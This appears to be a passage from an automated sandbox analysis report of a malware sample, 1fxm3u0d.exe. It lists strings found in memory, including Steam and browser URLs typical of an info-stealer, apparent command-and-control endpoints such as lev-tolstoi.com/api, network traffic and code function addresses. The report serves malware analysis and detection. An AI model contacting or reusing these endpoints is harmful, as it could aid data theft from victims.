                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=THDq-gsQ
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=0Xxx
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=kOc26QwM0vlX&l=e
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                Source: 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                Source: 1fxm3u0d.exe, 00000003.00000003.2193618825.0000000005A8A000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193777307.0000000005A87000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193683673.0000000005A87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: 1fxm3u0d.exe, 00000003.00000003.2193618825.0000000005A8A000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193777307.0000000005A87000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193683673.0000000005A87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: 1fxm3u0d.exe, 00000003.00000003.2193618825.0000000005A8A000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193777307.0000000005A87000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193683673.0000000005A87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: 1fxm3u0d.exe, 00000003.00000003.2165613383.00000000033A0000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2167175724.00000000033A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://faulteyotk.site/api(
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                Source: 1fxm3u0d.exe, 00000003.00000003.2280756454.0000000003405000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165300750.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2167175724.0000000003390000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165613383.0000000003390000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000002.2386552743.000000000336E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
                Source: 1fxm3u0d.exe, 00000003.00000003.2381436216.0000000003405000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000002.2386904956.0000000003405000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/A
                Source: 1fxm3u0d.exe, 00000003.00000003.2280589839.0000000003405000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2280756454.0000000003405000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/U
                Source: 1fxm3u0d.exe, 00000003.00000003.2320693548.000000000339C000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2320587716.000000000340F000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2280756454.00000000033EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
                Source: 1fxm3u0d.exe, 00000003.00000003.2280589839.000000000339C000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2381261813.00000000033A4000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2308206349.000000000339C000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2370076676.00000000033A4000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000002.2386763514.00000000033A5000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2320693548.000000000339C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api0
                Source: 1fxm3u0d.exe, 00000003.00000003.2258095932.0000000005AE7000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2257813367.0000000005AE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api30Qy
                Source: 1fxm3u0d.exe, 00000003.00000003.2166952473.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165300750.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apic
                Source: 1fxm3u0d.exe, 00000003.00000003.2370076676.0000000003405000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2308206349.0000000003405000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2320693548.0000000003405000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apidE
                Source: 1fxm3u0d.exe, 00000003.00000002.2386928574.0000000003417000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apimalISo
                Source: 1fxm3u0d.exe, 00000003.00000003.2381498811.0000000003390000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2370076676.0000000003405000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2308206349.0000000003405000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2320693548.0000000003405000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000002.2386552743.0000000003390000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
                Source: 1fxm3u0d.exe, 00000003.00000003.2381436216.0000000003405000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000002.2386904956.0000000003405000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2370076676.0000000003405000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2308206349.0000000003405000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2320693548.0000000003405000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/r
                Source: 1fxm3u0d.exe, 00000003.00000003.2370076676.00000000033A4000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2320693548.000000000339C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/api
                Source: 1fxm3u0d.exe, 00000003.00000003.2165613383.00000000033A0000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2167175724.00000000033A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://servicedny.site/apiP
                Source: 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                Source: 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                Source: 1fxm3u0d.exe, 00000003.00000003.2167175724.0000000003390000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165613383.0000000003390000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                Source: 1fxm3u0d.exe, 00000003.00000003.2167175724.0000000003390000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165613383.0000000003390000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900cs
                Source: 1fxm3u0d.exe, 00000003.00000003.2280589839.000000000339C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/w
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                Source: 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                Source: 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                Source: 1fxm3u0d.exe, 00000003.00000003.2259261671.0000000005D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: 1fxm3u0d.exe, 00000003.00000003.2259261671.0000000005D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: 1fxm3u0d.exe, 00000003.00000003.2193618825.0000000005A8A000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193777307.0000000005A87000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193683673.0000000005A87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: 1fxm3u0d.exe, 00000003.00000003.2193618825.0000000005A8A000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193777307.0000000005A87000.00000004.00000800.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2193683673.0000000005A87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: 1fxm3u0d.exe, 00000003.00000003.2259261671.0000000005D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                Source: 1fxm3u0d.exe, 00000003.00000003.2259261671.0000000005D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                Source: 1fxm3u0d.exe, 00000003.00000003.2259261671.0000000005D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: 1fxm3u0d.exe, 00000003.00000003.2259261671.0000000005D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: 1fxm3u0d.exe, 00000003.00000003.2259261671.0000000005D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                Source: 1fxm3u0d.exe, 00000003.00000003.2259261671.0000000005D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: 1fxm3u0d.exe, 00000003.00000003.2166837702.0000000003407000.00000004.00000020.00020000.00000000.sdmp, 1fxm3u0d.exe, 00000003.00000003.2165118116.0000000003407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.5:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49712 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49718 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49724 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49738 version: TLS 1.2
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_001741B00_2_001741B0
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_00186A200_2_00186A20
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_00174BD00_2_00174BD0
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_00173D400_2_00173D40
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_001838100_2_00183810
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_001710000_2_00171000
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_0018B0400_2_0018B040
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_001760900_2_00176090
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_0017A8A00_2_0017A8A0
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_001771400_2_00177140
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_0017B1400_2_0017B140
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_001759600_2_00175960
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_0018D9800_2_0018D980
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_0017E1F00_2_0017E1F0
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_001831F00_2_001831F0
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_00178A000_2_00178A00
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_00179A300_2_00179A30
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_0018BA200_2_0018BA20
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_0018CA600_2_0018CA60
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_001792800_2_00179280
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_0018C2800_2_0018C280
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_0019CAA00_2_0019CAA0
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_001852F00_2_001852F0
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_001A92E90_2_001A92E9
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_00177B300_2_00177B30
                Source: C:\Users\user\Desktop\1fxm3u0d.exeCode function: 0_2_0018E3400_2_0018E340
